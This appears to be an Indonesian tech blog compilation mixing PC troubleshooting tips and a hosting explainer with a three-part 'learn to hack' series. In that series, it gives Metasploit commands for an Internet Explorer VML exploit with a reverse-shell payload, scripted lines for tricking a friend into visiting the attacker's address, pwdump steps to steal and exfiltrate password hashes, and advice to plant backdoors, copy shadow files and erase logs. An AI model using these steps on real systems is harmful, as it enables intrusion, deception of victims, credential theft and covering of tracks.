Mengatasi Masalah Komputer Restart Sendiri

Pengguna windows sering kali menemui masalah komputer restart sendiri berulangkali. Ada banyak penyebab komputer restart sendiri. Banyak sekali jawaban yang ada di berbagai forum maupun di website microsoft tentang penyebab dan solusinya sehingga membuat pengguna semakin bingung untuk mengatasi masalah tersebut. Sebenarnya kalo komputer restart sendiri dalam frekuensi yang tidak sering adalah suatu hal yang wajar karena pada windows XP, windows 7 maupun windows vista hal ini merupakan antisipasi untuk mencegah kerusakan pada hardware ataupun software yang terinstal. Setting autorestart pada windows XP dapat dilihat pada system properties yang dapat diakses dengan klik start kemudian klik kanan my computer dan klik pada advance trus system startup and recovery. Hardware yang terlalu panas bisa membuat komputer restart tiba-tiba. Hal ini dimaksudkan untuk melindungi komputer tersebut.
Jika terjadi kegagalan sistem (system failure) maka system akan melakukan restart, apabila autorestart kita hilangkan maka akan kita dapatkan layar biru pesan tanda sistem gagal BOSD (Blue Screen of Death) dan kita mendapatkan pesan errornya. Pada website microsoft tentang windows xp yang restart sendiri berikut hanya tertera bagaimana untuk menghilangkan setting autorestartnya saja. Solusi permasalahan tersebut tidak diberikan dalam tulisan tersebut. Mengenai sistem failure ini penyebabnya berbagai macam dan cukup sulit untuk menemukannya. Untuk melihat kemungkinan penyebabnya kita bisa melihat pada event viewer system. pada windows Xp cukup ketik eventvwr pada Start>Run maka akan muncul window event viewer. Disitu kita bisa liat apa yang menyebabkan restart dengan melihat file file yang ada. Pada komputer saya pada event viewer dapat ditemukan peringatan “The computer has rebooted from a bugcheck. The bugcheck was: 0x0000008E bla bla”. Untuk mengecek arti bugchek code dapat diliat disini.
Pada masing masing kode ada keterangan penyebab dari error tersebut. Sayangnya pada komputer saya restart tersebut disebabkan oleh bugcheck code yang berbeda-beda. Jika terjadi seperti ini maka perlu sabar untuk troubleshooting satu persatu hardware dan software yang terinstal. Untuk software atau kerusakan pada driver pastikan software atau driver terakhir yang terinstal yang kemungkinan menyebabkan error ini. Untuk melihat recordnya kita bisa lihat di accesoris.system tool>system restore dan melihat tanggal-tanggal windows melakukan backup. Liat perubahan yang tercatat disitu. Jika ada perubahan pada driver atau terinstalnya software baru, coba untuk merestore setting sebelum driver tersebut berubah dan menguninstal software terbaru yang mungkin menimbulkan crash. Crash juga sering ditimbulkan oleh adanya virus, maka jangan lupa untuk melakukan full scan dengan antivirus yang terupdate. Melepas hardisk dan menscan dengan komputer lain bisa dilakukan kalau antivirus pada komputer tersebut sudah terinfeksi virus yang menyerang. Jika hal ini tidak menolong maka lakukan beberapa hal dibawah ini:

1. Lepas RAM dan video card kemudian bersihkan kaki kakinya dan pasang lagi.
2. Jika masalah masih tetap terjadi coba liat display adapternya dan install driver terbaru dari video card tersebut.
3. Jika hal ini tidak berhasil maka coba lepas salah satu RAM, atau ganti ram dengan ram komputer lain jika ada begitu juga dengan display adapater.
4. Untuk memastikan RAM tidak bermasalah bisa juga menggunakan memory test yang softwarenya bisa di download di link berikut. Software tersebut harus di burn ke CD dan dipakai untuk booting dan mengecek error pada RAM.
5. Check juga error pada harddisk dengan melakukan scan disk for error dengan perintah chkdsk /f/r pada Run.
6. Pastikan konektor ke display adapter dari monitor dan kabel-kabel lainnya tertancap dengan benar
7. Jika semua hardware tersebut tidak ada masalah maka coba untuk merepair instalasi windows dan jangan lupa data diback up dahulu.
8. Pilihan terakhir adalah memformat ulang hardisk dan instal ulang windows.
9. Jika hal ini tidak juga mengatasi masalah maka kemungkinan ada problem pada motherboard.

Kegagalan sistem baik karena hardware maupun software sangat sering terjadi. Jadi sebaiknya melakukan back data secara berkala. kalau tidak mau troubleshooting software maka dengan mudah dapat dilakukan instal ulang. Jika masalah bukan pada sistem operasi maka untuk hardware harus dicek satu persatu.

Berikut 10 Penyebab komputer lambat dan cara mengatasinya

Setelah dalam postingan sebelumnya blog gaptek ini membahas tentang beberapa tips&trik hacking,  Nah., maka dalam postingan kali ini ane akan membahas tentang 10 hal yang bisa menyebabkan komputer menjadi lambat, lemot, lelet, alias lolaaa hehe... Dan cara mengatasinye

Berikut 10 Penyebab komputer lambat dan cara mengatasinya:
1. Komputer lambat karena kekurangan Memory
>Masalah komputer lambat karena minimnya RAM yang terpasang merupakan hal yang umumnya sudah diketahui oleh semua pengguna komputer.
>Untuk itu cobalah cek kapasitas memory yang terpasang, untuk komputer sekelas Intel Pentium 4 dengan OS Windows XP dan aplikasi standar sebaiknya upgrade-lah memory menjadi minimal 1 GB.

2. Komputer lambat karena terlalu banyaknya program yang terinstall.
>Secara pribadi saya sering menemukan komputer terutama milik pribadi yang di-install bermacam-macam program didalamnya, padahal aplikasi tersebut jarang atau bahkan tidak pernah digunakan sama sekali.
>Periksalah program apa saja yang terinstall dikomputer dengan cara klik Add/Remove Program di Control Panel dan un-install program-program yang hanya menjadi "accesories" tersebut.

3. Komputer lambat karena terlalu banyak startup programs dan service yang berjalan.
>Hal ini berkaitan dengan point no 2, semakin banyak program yang terinstall, semakin banyak pula program dan service yang akan dijalankan ketika windows startup.
>Untuk menonaktifkan startup program dan service yang berjalan otomatis tersebut, masuklah ke "System Configuration Utility" dengan cara ketik: msconfig pada menu run, kemudian pada tab service dan startup lakukan uncheck terhadap aplikasi-aplikasi yang tidak diperlukan.
>Untuk melihat aplikasi apa saja yang sedang berjalan, kita bisa menggunakan tool Prosesexplorer. Dengan tool ini kita dapat melihat dan menonaktifkan (kill) aplikasi apa saja yang tidak diperlukan atau dicurigai sebagai virus.

4. Komputer lambat karena Temporary File yang sudah membengkak
>Penyebab komputer lambat yang ke empat adalah sudah membengkaknya file-file temporary (sementara). Untuk Windows Xp lokasi file tersebut ada di:"C:\Documents and Settings\nama_user\Local Settings\Temp" dan"C:\WINDOWS\Temp". 

>Untuk membersihkannya, delete-lah file-file yang terdapat di kedua lokasi tersebut atau jalankan program Disk CleanUp dengan cara klik start-run, ketik: "cleanmgr" lalu pilih drive yang akan di-cleanup.

5. Komputer lambat karena terlalu banyak program yang berfungsi sebagai "security program"
>Security program seperti program antivirus dan firewall merupakan aplikasi tambahan yang harus ada pada komputer, tetapi janganlah terlalu berlebihan misalnya dengan menginstall 2-3 program antivirus sekaligus.
>Untuk masalah security windows, yang terpenting adalah lakukan update, aktifkan firewall dan gunakan antivirus yang tidak membebani komputer seperti misalnya PCMAV Antivirus serta berhati-hatilah ketika menggunakan USB Flashdisk / Memory Card.

6. Komputer lambat karena masalah pada hardisk
>Hardisk merupakan komponen kedua setelah RAM yang bisa menyebabkan komputer menjadi lambat. Masalah Komputer lambat yang disebabkan oleh hardisk ini diantaranya karena:
 - hardisk low space
- hardisk yang terfragmentasi
- hardisk yang sudah lama, sehingga rpm-nya menurun
- hardisk error / bad sector
>Cara mengatasi komputer lambat karena masalah pada hardisk diatas adalah:
- upgrade kapasitas hardisk dengan menambah atau ganti hardisk
- lakukan defragmenter pada hardisk secara berkala
- hindarkan hardisk dari debu, goncangan dan panas berlebih.
- perbaiki kerusakan pada hardisk dengan tool checkdisk.

7. Komputer lambat karena adanya virus, malware atau spyware pada komputer.
>Apabila komputer kita sudah terlebih dahulu terserang virus atau malware, maka sebaiknya jalankan Windows Safe Mode, matikan fasilitas system restore dan gunakanlah program Virus Cleaner seperti misalnya Norman Malware Cleaner untuk membersihkan virus atau malware tersebut dan lakukan pula update pada sistem operasi.

8. Komputer lambat karena System Files ada yang corrupt atau bahkan hilang.
>Biasanya terjadi setelah komputer terinfeksi virus dan file-file yang terinfeksi tersebut terlanjur rusak atau terdelete oleh antivirus. Solusi yang paling gampang adalah dengan merepair sistem operasi yang digunakan.

9. Komputer lambat karena masalah hardware overheat.
>Hardware overheat baik itu terjadi pada hardisk, vga card, processor atau cpu secara umum bisa menyebabkan menurunnya kinerja komputer yang pada akhirnya komputer menjadi hang, lambat atau bahkan  sering restart. Untuk itu pastikan sirkulasi udara pada bagian dalam CPU berjalan dengan baik begitu juga pada fan (kipas angin) harus bersih dari debu dan dapat berputar dengan lancar.

10. Komputer lambat karena adanya masalah konektifitas pada jaringan / network
>Hal ini bisa terjadi karena trafic jaringan yang tinggi, hub atau switch yang hang atau adanya virus yang mencoba masuk ke sistem komputer kita. Untuk mengatasinya, coba lepas dan pasangkan kembali konektor RJ45 pada LAN Card atau Roset LAN, restart Switch / hub dan gunakan program Port scanner untuk melihat packet data apa saja yang masuk dan keluar dari komputer kita.
>Mungkin itulah beberapa hal penyebab dan cara mengatasi komputer lambat yang bisa saya simpulkan berdasarkan pengalaman yang sering saya temui, tambahan dan koreksi lainnya saya tunggu...thanks.
>Read more: http://www.catatanteknisi.com/2010/12/cara-mengatasi-penyebab-komputer-lambat.html#ixzz1ocB4pS8C

Belajar Hack (1) - Konsep Dasar Hacking

Intro
Dalam suatu kesempatan, saya pernah melihat seorang auditor keamanan jaringan melalukan penetration test (pen-test) terhadap suatu sistem IT. Karena penasaran saya melihat sedikit2 cara penetration test yang dilakukan. Waktu itu saya belum banyak tahu tools apa aja yang digunakan, yang saya tau dia menggunakan tcpdump untuk menganalisis paket apa aja yang lewat, trus untuk men-scan beberapa host menggunakan Nessus. Ada salah satu aplikasi yang digunakan berbasis web yang terdapat kumpulan beberapa exploit. Waktu itu saya belum tahu aplikasi apa itu, yang saya ingat aplikasi itu menggunakan alamat http://127.0.0.1:55555, nah berbekal port 55555 saya mencari di google, dan ternyata itu adalah Metasploit Framework!.

Peristiwa itu menginspirasikan saya untuk mengenang masa-masa lalu ketika masih seneng2nya ngoprek dan belum ‘tercemar’ oleh DotA. Akhirnya sekarang saya ingin belajar ngoprek lagi, tp lebih fokus ke exploitnya saja. Tulisannya ini akan saya buat menjadi tiga bagian. Bagian pertama mengenai bagaimana salah satu cara umum yang dilakukan untuk menge-hack suatu system. Disini saya lebih menitikberatkan untuk hacking OS Windows XP, karena OS ini paling banyak dipakai orang. Bagian kedua lebih banyak ke teori mengenai exploit. Tapi karena mungkin akan sangat sulit dipahami (saya sendiri msh blm bisa membuat exploit sendiri), saya hanya menuliskan hasil terjemahan yang membahas apa itu dan cara kerja exploit. Sedangkan bagian terakhir merupakan praktek bagaimana mengelakukan penetration test menggunakan metasploit di Windows XP.
Bagian 1

*ini merupakan artikel lama mengenai salah satu cara umum yang dilakukan untuk hacking. (artikel ini jg di mirror oleh Negative a.k.a Jim Geovedi di sini). Langkah dibawah ini merupakan cara ’standar’, hacking sebenarnya tidak harus selalu sesuai dengan ’standar’ ini.

Hacking buat pemula

- by aCh

Artikel ini ditujukan bagi pemula, dan disusun oleh pemula. Ditulis untuk pengetahuan semata. Untuk temen2 yg udah ahli, sok aja dilewat, tapi dibaca juga gpp….

Apa sebenarnya hacking itu? klo menurut pengertian gue, hacking adalah ngoprek. Yup, hacking adalah ngoprek, mempelajari sesuatu dengan keingintahuan (curiosity) yg tinggi, ngutak atik sesuatu, ‘ngudek-ngudek’ sampai ke ‘jeroannya’. Sesuatunya apa dong? ya terserah… bisa komputer, mobil, motor, mesin. Tapi masalahnya ada ngga ya hacker mobil, hacker motor, atau hacker pesawat terbang?? hehe… Walaupun saat ini hacking identik dengan ‘bobol-membobol’, tapi gue kurang setuju klo cuman bobol server orang doang!. Ada yang bilang ‘Hacking is Art’, trus dimana letak seninya dong? Mau tau pengertian hacking sebenarnya, coba baca artikel sebelumnya (How to Become A Hacker). Di situ dijelasin bahwa hacker berkaitan dengan kemahiran teknis serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Contoh hacker pada saat ini yang sering-sering disebut adalah Linus Torvald (tau ngga? itu lho yang menciptakan Linux). Apa dia tukang bobol? belum tentu kan….

Pada artikel ini, gue pengen membagi pengalaman mengenai Hacking, walaupun sampai saat ini gue belum pernah nge-Hack ke server orang. Salah satu cara untuk mencoba simulasi Hack yaitu H3cky0uRs3lf! Buat komputer kita sebagai server (sekaligus belajar konfigurasi server) trus install program yg dibutuhkan. Misalnya klo mo Web Hacking, coba install Apache atau IIS. Atau kita sesuaikan dengan exploit yang udah kita dapet. Tapi lebih baik install Linux atau FreeBSD dulu di komputer pribadi, trus konfigurasi sebagai server, lalu simulasi Hack, setelah itu baru Hack Betulan… Apalagi klo di kost ada jaringan.

Pro dan Kontra Hacking
Pro
Kontra
Etika Hacking
Semua informasi adalah free
Jika semua informasi adalah free, maka tidak ada ladi privacy
Aspek Security
Intrusion adalah ilustrasi kelemahan sistem
Tidak perlu menjadi pencuri untuk menunjukkan pintu yang tidak terkunci
Idle Machines
Hacking hanya pada idle machines
idle machines milik siapa ?
science education
hanya membobol tapi tidak merusak
“hacker wannabe” berpotensi sangat besar untuk merusak
Okeh, sekarang waktunya melakukan aksi…
1. Fase Persiapan
~ Mengumpulkan informasi sebanyak-banyaknya
- Secara Aktif : - portscanning
- network mapping
- OS Detection
- application fingerprinting
Semua itu bisa dilakukan menggunakan toolz tambahan seperti nmap atau netcat
- Secara Pasif : - mailing-list (jasakom, newbie_hacker, hackelink, dsb)
- via internet registries (informasi domain, IP Addres)
- Website yang menjadi terget

2. Fase Eksekusi
~ Setelah mendapatkan informasi, biasanya akan didapatkan informasi mengenai OS yg digunakan, serta port yang terbuka dengan daemon yg sedang berjalan. Selanjutnya mencari informasi mengenai vulnerability holes (celah kelemahan suatu program) dan dimanfaatkan menggunakan exploit (packetstromsecurity.org, milw0rm, milis bugtraq, atau mencari lewat #IRC).
~ Mengekspolitasi Vulnerability Holes
- compile eksploit -> local host ->

$gcc -o exploit exploit.c
$./exploit

# hostname (# tanda mendapatkan akses root)

remote host -> $gcc -o exploit exploit.c

$./exploit -t www.target.com

# (klo beruntung mendapatkan akes root)

~ Brute Force

- Secara berulang melakukan percobaan otentifikasi.

- Menebak username dan password.

- Cracking password file

~ Social Engineering

- Memperdayai user untuk memeberi tahu Username dan password

- Intinya ngibulin user….


3. Fase Setelah Eksekusi

~ Menginstall backdoor, trojans, dan rootkit

~ Menghapus jejak dengan memodifikasi file log agar tidak dicurigai admin

~ Menyalin /etc/passwd atau /etc/shadow/passwd

Nah, intinya seh cara masuk ke server seseorang seperti fase diatas. Mencari informasi, temukan exploit, dan tinggalkan backdoor. Cuma masalahnya hacking bukanlah segampang cara-cara diatas. Itu hanyalah teori, banyak hal yang harus diperhatikan jika ingin mempraketekkan hacking ke server seseorang. Jangan sekali-kali mencoba2 hacking ke server orang tanpa memperhatikan anonimitas (apalagi klo connectnya lewat komputer pribadi tanpa menggunakan proxy). Ntar klo ketahuan bisa repot. Saran gue, cobalah pada mesin localhost dulu (komuter pribadi), klo terhubung ke LAN lebih bagus. Sediakan server yang khusus buat dioprek. Kalaupun pun ga terhubung ke jaringan, kita masih bisa menggunakan Virtual Machine menggunakan VMWare seperti yang nanti akan dibahas pada bagian 3!


Referensi :

-Hacking and Defense, Jim Geovedi, negative@magnesium.net

-Network Defense, Jim Geovedi, negative@magnesium.net

Belajar Hack (2) - What is an Exploit?
8 11 2006

*This article originally was written by Pukhraj Singh, K.K. Mookhey, you can get it from here. I am just repost and summarize it so you can understand what is an exploit. I’m sorry not to translate this article into Bahasa Indonesia coz I’m too lazy. Maybe you want to help us to translate it? :-)

Exploit

sploit
(n.) Exploit. A defect in the game code (see bug) or design that can be used to gain unfair advantages. (Source: Dictionary of MMORPG Terms)

At present the exploit development community (hackers and security professionals alike) is more sentient than ever before. The timeline between the release of an advisory and the development of an exploit has shrunk to a great extent. Exploit development, which was considered more of Wiccan art, has reached large masses. The network security administrator needs to be more vigilant then ever before as the enemy is always one step ahead with the latest exploit in his hand.
Memory organization

The basic exploitation techniques can be methodically categorized, like any other technical issue. Before going further, however, the reader must be aware of the basic process of memory organization. A process running in memory has the following sub-structures:

Code is the read-only segment that contains the compiled executable code of the program.

Data and BSS are writable segments containing the static, global, initialized and un-initialized data segments and variables.

Stack is a data structure based on Last-In-First-Out ordering. Items are pushed and popped from the top of the stack. A Stack Pointer (SP) is a register which points to the top of the stack (in most cases). When data is pushed on the stack, SP points to (the top of the stack). Stack grows towards negative memory addresses. It is used for storing the context of a process. A process pushes all its local and dynamic data on to the stack. Instruction Pointer (IP) is a register used to point to the address of the next instruction to be executed. The processor looks at IP each time to find the next instruction to be executed. When an abrupt program redirection takes place (generally due to jmp or call) the address of the next instruction, after returning back from redirection, can be lost. In order to overcome this problem the program stores the address of the next instruction to be executed (after returning from jmp or call) on the stack, and it is called the return address (implemented through assembly instruction RET). This is how a normal program containing many function calls and goto instructions keeps track of right path of execution.

Heap is basically the rest of the memory space assigned to the process. It stores data which have a lifetime in between the global variables and local variables. The allocator and deallocator work to assign space to dynamic data and free heap memory respectively.

This was a brief fly-over on the basics of process organization. Now I describe some techniques recurrently used to abuse the harmony of process organization.
Buffer overflows

The word gives goose bumps to any person who has dealt with them, be it a coder, an application tester or the security administrator. Some say it’s the biggest security risk of the decade. The technique of exploitation is straightforward and lethal. The stack of the program stores the data in order whereby the parameters passed to the function are stored first, then the return address, then the previous stack pointer and subsequently the local variables. If variables (like arrays) are passed without boundary checks, they can be overflowed by shoving in large amounts of data, which corrupts the stack, leading to the overwrite of the return address and consequently a segmentation fault. If the trick is craftily done we can modify the buffers to point to any location, leading to capricious code execution.
Heap overflows

The allocated memory in a heap is organized as a doubly linked list. By performing an overflow we can modify the pointers of the linked list to point into memory. Heap overflows are hard to exploit and are more common in Windows as they contain more prominent data which can be exploited. In the case of a malloc memory allocation system, the information regarding the free and allocated memory is stored within the heap. An overflow can be triggered by exploiting this management information such that we can write to random memory areas afterwards, which can lead to code execution.

So how is the overflow triggered? There are many weapons in the stockpile like strings and string functions, format strings, null pointers, integer overflows, signed issues and race conditions which can be a help to generate exceptional conditions in a process.

I stress the fact that this article was not meant to be a definitive guide to various exploitation techniques. We only provide a quick overview of what is important, in order to get a solid understanding of the things to come in subsequent parts of this article. They just act as pointers for further reference

The Birth of an Exploit

Exploit development tools and automated frameworks for exploit testing and simulation is the need of the hour. Metasploit Framework (MSF) is something which fits the bill. Its latest release has the agility and muscle quite comparable to its high priced commercial counterparts and the lethality to code an exploit in the shortest possible timeframe, due to a very well defined interface for development. With a complete exploit environment, working exploits, effectual payloads and added handlers, this is one tool which the penetration testers must utilize.

The body or structure of an exploit can be divided into various components, as described in Figure 1. We describe some exploit miscellany which will help us to analyze the figure as shown.

exploit.JPGFigure 1
Shellcode

This is the payload which is to be executed after exploitation. In most cases we redirect the path of execution so that the injected payload is executed. Hence the return address is made to point to this shellcode. It comprises of assembly instructions encoded as a binary string which perform operations like spawning a shell. A good piece of shellcode must be a trade-off between and size and complexity. There are a lot of verifications to be made during payload encoding like keeping a check on restricted characters. Nowadays, payloads have been customized to be very short and require less space. They can execute many complex operations from opening a listening socket to even loading a compiler on the remote computer.
Injection vector

The pointer or offset where the shellcode is placed in a process and the return address is modified to point to.

Request builder

This is the code which triggers the exploit. If it’s related to string functions, then scripting languages are generally preferred.

Handler Routine

This part generally consumes the majority of the code. This is a handler for the shellcode doing operations like linking to a bindshell, or connecting console to a socket.

User options handler

It is basically a user level front-end providing the user with various control options like remote target selection, offset selection, verbosity, debugging and other options. This forms majority of the exploit code and makes the code quite bulky.

Network connection Handler

This comprises of the various routines which handle network connections like name resolution, socket establishment, error handling etc.

As we can see there is a lot of unnecessary and repetitive code which makes the exploit really bulky and error prone.

In the course of development, many problems are faced which hinder the exploit development process. The mad race of people trying to release the exploit first leads to a lot of bad and unnecessarily complicated code.

Some exploits need an understanding of deeper concepts and research, such as exploits based on network protocols (RPC, SMB and SSL) and obfuscated APIs. Also, not much information is revealed in the advisory so there is always the need for experimentation.

Finding target values is also one big headache which involves lot of trial and error.

Finally, most payloads are hard coded and any changes breaks the exploit.

Many firewalls and IPSes detect and block shellcode.

Time is of primary concern, and some exploits consume quite a lot of time and concentration, both of which are the precious assets of a security researcher.

All said and done, coding exploit is one hell of a messy job!

gmn.. ngerti ga?? ga mudheng ya… sama dong! ;p

ah… ini mah kebanyakan teorinya, mana!!.. mana prakteknya?!

sabar, orang sabar pantatnya lebar ;p kenapa saya posting artikel itu? soalnya biar kita ngerti, minimal tahu lah apa yang kita pakai (exploit). Tidak semua exploit yang kita peroleh diinternet itu aman, kadang-kadang malah ada backdoornya. Jadi lebih baik, klo pakai exploit lihat2 source codenya juga. yah pura2 aja ngerti, biar keliatan keren!

Belajar Hack (3) - Hack Windows XP SP2
14 11 2006

*Fyuhh… akhirnya sempet juga nyelesain tulisan ini. Yosh.. here is the prof of concept!.

Disclaimer: This document was written in the interest of education. The author cannot be held responsible for how the topics discussed in this document are applied.

Setelah mengetahui sedikit dan konsep dasar ‘standar’ mengenai hack yang dibahas dibagian pertama dan mengetahui sedikit materi mengenai exploit pada bagian kedua, sekarang langsung aja kita praktek. Disini saya sengaja menggunakan VMWare untuk melakukan simulasi, karena tidak semua orang dapat mempraktekannya dalam suatu jaringan. Dengan menggunakan VMWare, kita dapat mensimulasikan jaringan sederhana yang seolah-olah ada suatu jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya. Bagi yang belum bisa menggunakan VMWare, coba cari diinternet! Sistem Operasi yang saya gunakan adalah Windows XP SP2.

Tools yang saya gunakan adalah Metasploit Framework untuk melakukan exploit serta PwDump6 untuk mengambil hash file dari komputer target. Apa itu Metasploit Framework ?

The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, and vulnerability research.

Untuk penggunaan lebih lanjut mengenai Metasploit, anda dapat membaca dokomentasi yang juga diikutsertakan dalam instalasi. Untuk melakukan instalasi metasploit versi 2.7, dibutuhkan user administrator. Sebelumnya saya mencoba menginstall dengan ‘limited user’ tapi setelah diinstall tidak bisa dijalankan. Sebenarnya instalasi metasploit ini hanya mengekstrak file saja. Jadi anda dapat menginstallnya tanpa harus mendapatkan user admin serta meletakkannya dimanapun tanpa harus menginstal di Folder Program Files. Namun setelah sedikit dioprek, ternyata tidak harus admin yang bisa menjalankan. Agak ribet dan males juga sih nulis disini, soalnya ketika mencoba versi terbaru, yaitu versi 3 Beta 3, kita dapat menjalankannya tanpa harus menginstall dengan user admin. Gitu aja ko repot! Lagipula versi 3 (skarang msh beta) lebih keren dan fiturnya lebih banyak. Tapi sayangnya untuk msfweb (versi webnya) belum bisa dijalankan sepenuhnya.

Ok.. sekarang saya asumsikan anda telah membaca userguide metasploit (ah.. paling asumsi saya salah ;p). Biar lebih keliatan keren dan memahami detailnya, saya menjelaskan metasplooit yang menggunakan console (mfsconsole) saja. Metasploit menggunakan cygwin untuk menjalankannya, karena metasploit dibuat menggunakan Perl. Sekarang mari kita praktekkan!!

Pertama2 jalankan ‘mfsconsole’!

main1.JPG

Untuk mempelajari command apa saja yang ada di MSFConsole gunakan perintah ‘help’.

Karena komputer yang ingin dijadikan target adalah Windows XP SP2, maka digunakan exploit yang berpengaruh terhadap XP SP2 yaitu dengan memanfaatkan kelemahan pada Internet Explorer VML Fill Method Code Execution.

This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.

Untuk melihat info dari exploit ini gunakan perintah :

msf > info ie_vml_rectfill

Exploit ie_vml_rectfill memanfaatkan kelemahan pada Internet Explorer. Oleh karena itu, exploit ini akan berpengaruh jika komputer target menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus menggunakan sedikit ‘social engineering’, seperti jika di kost/lab/kantor kita bilang ke teman kita bahwa kita sedang mencoba membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE ke alamat IP (atau nama komputer) kita. Misalkan http://192.168.186.1. Biasanya setelah exploit ini dijalankan dan komputer target telah terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan exploit ‘bekerja’. Setelah beberapa saat bilang aja “wah.. ada error nih. Ok deh.. saya coba betulin dulu… makasih ya”. Baru tutup IE-nya pake Task Manager (walaupun pake TM, IE msh sulit di-kill, jangan lupa untuk me-’end process’-kan ‘dumpred.exe’ juga, tapi setelah exploit bekerja :-D ).


Untuk menggunakan exploit gunakan perintah2 berikut dalam console :

msf > use_ie_vml_rectfill

msf > set PAYLOAD win32_reverse

msf > set RHOST ip_target

msf > set LHOST ip_penyerang

msf > exploit

Hasilnya akan tampak seperti gambar berikut :

exploit1.JPG

Dalam contoh diatas, IP komputer target (RHOST) adalah 192.168.186.128, sedangkan komputer penyerang (LHOST) adalah 192.168.186.1. Lalu ‘payload’ yang digunakan adalah ‘win32_reverse’ dan HTTP PORT nya adalah 80 (default http port). Setalah menjalankan perintah ‘exploit’, baru kita minta komputer target untuk menjalankan IE dan mengarahkan url-nya ke komputer kita. Proses ini akan memakan waktu agak lama, bahkan terkadang tidak berhasil. Jadi coba-coba aja terus :-D

Jika anda berhasil, maka anda akan mendapatkan ‘cmd.exe’ dari komputer target.

Crack da Password!

Nah, setelah kita ‘menguasai’ komputer target, skalian aja kita lihat password-nya. Caranya mirip dengan artikel saya sebelumnya tentang Hack Win XP SP2 Password, tapi karena ini remote maka kita harus ‘menyediakan’ program yg dibutuhkan yaitu PwDump. Agar cara ini berhasil, saya asumsikan pada komputer target user yang sedang login mempunyai akses admin. Klo user yang digunakan komputer target yang dimanfaatkan IE-nya hanya user ‘biasa’, pwdump tidak akan berhasil!

Pertama kita share dulu PwDump dari komputer kita dengan full access agar kita bisa mengupload hasil dump password komputer target, tapi dengan akhiran ‘$’ biar tidak terlihat dikomputer umum. Misalkan nama folder yang di share PwDump$. Lalu dari console yang berhasil dihack, ambil PwDump dengan Map Network Drive dari komputer kita dengan ‘net use’. Contoh perintah yang digunakan :

pwdump.JPG

Setelah itu copy Pwdump ke komputer target dalam folder sementara, ‘temp’. Setelah Pwdump berhasil di-copy ke komputer target, jalankan Pwdump dengan perintah

C:\temp\Pwdump –o pass.txt 127.0.0.1

Klo berhasil akan tampak pada gambar berikut.

dump1.JPG

Lalu copy file pass.txt ke komputer kita

C:\temp\copy pass.txt z:

Dan terakhir, jangan tinggalkan jejak bahwa kita sudah mampir kesitu.

clean.JPG

Nah, udah dapet hash file nya kan. Tinggal di crack aja deh…. (baca artikel sebelumnya buat nge-crack password).

Sebenarnya masih banyak yang dapat dioprek dari metasploit. Dalam metasploit terdapat banyak exploit, payload, meterpreter, dsb yang sangat ‘menyenangkan’ untuk dioprek. Untuk mempelajari metasploit, disitusnya terdapat dokumentasi yang lumayan baik.

Happy Hacking…..


Beberapa saran agar windows kita tetap aman terhadap exploit diatas.

1. Jangan gunakan Internet Explorer. Gunakan Mozilla Firefox atau Opera!.

2. Patch Windows anda.

3. Gunakan antivirus dengan update terbaru

4. Hati2 terhadap teman anda sendiri.. waspadalah!! ;

Apa yang dimaksud dengan Hosting?

Hosting (disebut juga Web Hosting / sewa hosting) adalah penyewaan tempat untuk menampung data-data yang diperlukan oleh sebuah website dan sehingga dapat diakses lewat Internet. Data disini dapat berupa file, gambar, email, aplikasi/program/script dan database.
Pengertian Hosting dapat diibaratkan sebagai contoh berikut; sebuah website diibaratkan sama dengan kios/ruangan di Mall.
Manajemen Mall menyewakan ruangan, infrastruktur, listrik, telepon dan fasilitas lainnya agar orang-orang dapat membuka usaha. Setiap kios pengelolanya dapat berbeda, dekorasinya berlainan dan beroperasi masing-masing dengan caranya sendiri. Dalam hal ini kios atau ruangan yang disewa tentu mempunyai batasan ruangan (mis: 10m x 7m) dan maksimum adalah besarnya gedung Mall tersebut.
Perusahaan Hosting seperti IdeBagus menyediakan hardware, jaringan (infrastruktur), email (telepon), dan sebagainya agar anda dapat membuka/membuat website. Server (gedung Mall) kami dihuni oleh banyak pelanggan, masing-masing pelanggan mempunyai batas penggunaan diskspace (batasan ruangan) dan tentu saja setiap pelanggan mengoperasikan websitenya masing-masing.

Cara Dan Jenis Hacking & Hacker

Dalam dunia hacking (tepatnya cracking ding!?) dikenal beberapa jenis serangan terhadapserver. Berikut ini jenis-jenis serangan dasar yang dapat dikelompokkan dalam minimal 6kelas, yaitu:IntrusionPada jenis serangan ini seorang cracker (umumnya sudah level hacker) akan dapatmenggunakan sistem komputer server. Serangan ini lebih terfokus pada full access granteddan tidak bertujuan merusak. Jenis serangan ini pula yg diterapkan oleh para hacker untukmenguji keamanan sistem jaringan mereka. Dilakukan dalam beberapa tahap dan tidak dalamskema kerja spesifik pada setiap serangannya (dijelaskan pada artikel lain).Hacking is an Art!? =)Denial of Services (DoS)Penyerangan pada jenis DoS mengakibatkan layanan server mengalami stuck karena kebanjiranrequest oleh mesin penyerang. Pada contoh kasus Distributed Denial of Services (DDoS)misalnya; dengan menggunakan mesin-mesin zombie, sang penyerang akan melakukan packetingrequest pada server secara serentak asimetris dan simultan sehingga buffer server akankelabakan menjawabnya!? Stuck/hung akan menimpa server. Jadi bukan server lagi namanya!?(servicenya mati masak dibilang server? hehehe....)JoyriderNah, ini namanya serangan iseng!? Karena kebanyakan baca novel-novel hacking dan gak bisabelajar benar, isenglah jadinya nyoba-nyoba nyerang pake ilmu-ilmu instan super cepat(istilahnya 'onani' dimesin orang). Atau dengan alasan pengen tau isinya mesin orang!? =).Yang jelas serangan jenis ini rata-rata karena rasa ingin tau, tapi ada juga yang sampemenyebabkan kerusakan atau kehilangan data.VandalJenis serangan spesialis pengrusak!? nothing else to explain mbah!? =)ScorekeeperSerangan yang bertujuan mencapai reputasi hasil cracking terbanyak. Biasanya hanyaberbentuk deface halaman web (index/nambah halaman) dengan memampangakan NickName dankelompok tertentu. Sebagian besar masih tidak perduli dengan isi mesin sasarannya =).Saat ini jenis penyerang ini lebih dikenal dengan sebutan WannaBe/Script kiddies.SpyTiga hurup saja. Jenis serangan untuk memperoleh data atau informasi rahasia dari mesintarget. Biasanya menyerang pada mesin-mesin dengan aplikasi database didalamnya. Kadangkala suatu perusahaan menyewa 'mata-mata' untuk mencuri data perusahaan 